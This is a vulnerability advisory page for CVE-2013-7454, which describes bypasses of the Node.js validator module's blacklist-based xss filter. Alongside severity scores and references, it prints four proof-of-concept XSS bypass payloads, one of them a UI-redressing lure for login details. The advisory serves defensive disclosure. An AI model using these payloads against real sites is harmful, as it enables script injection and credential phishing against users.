Vulnerability details: VCID-e5x8-jpa7-kqfx
Vulnerability ID VCID-e5x8-jpa7-kqfx
Aliases CVE-2013-7454
GHSA-q4qq-fm7q-cwp5
Summary: Multiple XSS Filter Bypasses

The validator module for Node.js contains functionality meant to filter potential XSS attacks (a filter called xss). Several ways to bypass the filter were discovered. In general, because the function's filtering is blacklist-based, it is likely that other bypasses will be discovered in the future. Developers are encouraged not to use the xss filter function in this package.

### Details:

Various inputs that could bypass the filter were discovered:

Improper parsing of nested tags:

```
<s <onmouseover="alert(1)"> <;s onmouseover="alert(1)">This is a test</s>
```

Incomplete filtering of javascript: URIs:

```
<a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a>
```

UI redressing:

```
<div style="z-index: 9999999; background-color: green; width: 100%; height: 100%">
<h1>You have won</h1>Please click the link and enter your login details:
<a href="http://example.com/">http://good.com</a>
</div>
```

Bypass via nested forbidden strings:

```
<scrRedirecRedirect 302t 302ipt type="text/javascript">prompt(1);</scrRedirecRedirect 302t 302ipt>
```

Additional bypasses were discovered by Krzysztof Kotowicz in 2012 when auditing CodeIgniter's XSS filtering function, on which this code was based.
Status Published
Exploitability 0.5
Weighted Severity 6.2
Risk 3.1
Weaknesses (3)
System Score Found at
cvssv3.1 6.1 http://blog.kotowicz.net/2012/07/codeigniter-210-xssclean-cross-site.html
generic_textual MODERATE http://blog.kotowicz.net/2012/07/codeigniter-210-xssclean-cross-site.html
cvssv3 6.5 http://blog.kotowicz.net/2012/07/codeigniter-210-xssclean-cross-site.html
epss 0.00482 https://api.first.org/data/v1/epss?cve=CVE-2013-7454
cvssv3.1 6.1 https://github.com/advisories/GHSA-q4qq-fm7q-cwp5
cvssv3.1_qr MODERATE https://github.com/advisories/GHSA-q4qq-fm7q-cwp5
generic_textual MODERATE https://github.com/advisories/GHSA-q4qq-fm7q-cwp5
cvssv3 6.5 https://github.com/nodejs/security-wg/blob/main/vuln/npm/41.json
cvssv3.1 6.1 https://nealpoole.com/blog/2013/07/xss-filter-bypass-in-validator-nodejs-module
generic_textual MODERATE https://nealpoole.com/blog/2013/07/xss-filter-bypass-in-validator-nodejs-module
cvssv3 6.5 https://nealpoole.com/blog/2013/07/xss-filter-bypass-in-validator-nodejs-module
cvssv3.1 6.1 https://nvd.nist.gov/vuln/detail/CVE-2013-7454
generic_textual MODERATE https://nvd.nist.gov/vuln/detail/CVE-2013-7454
cvssv3.1 6.1 https://www.npmjs.com/advisories/41
generic_textual MODERATE https://www.npmjs.com/advisories/41
cvssv3.1 6.1 http://www.openwall.com/lists/oss-security/2016/04/20/11
generic_textual MODERATE http://www.openwall.com/lists/oss-security/2016/04/20/11
No exploits are available.
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Found at http://blog.kotowicz.net/2012/07/codeigniter-210-xssclean-cross-site.html
Attack Vector (AV): network; Attack Complexity (AC): low; Privileges Required (PR): none; User Interaction (UI): required; Scope (S): changed; Confidentiality Impact (C): low; Integrity Impact (I): low; Availability Impact (A): none
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Found at https://github.com/advisories/GHSA-q4qq-fm7q-cwp5
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Found at https://nealpoole.com/blog/2013/07/xss-filter-bypass-in-validator-nodejs-module
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Found at https://nvd.nist.gov/vuln/detail/CVE-2013-7454
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Found at https://www.npmjs.com/advisories/41
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Found at http://www.openwall.com/lists/oss-security/2016/04/20/11
Exploit Prediction Scoring System (EPSS)
Percentile 0.65512
EPSS Score 0.00482
Published At June 4, 2026, 12:55 p.m.
Date Actor Action Source VulnerableCode Version
2026-06-02T03:45:02.054934+00:00 Npm Importer Import https://github.com/nodejs/security-wg/blob/main/vuln/npm/41.json 38.6.0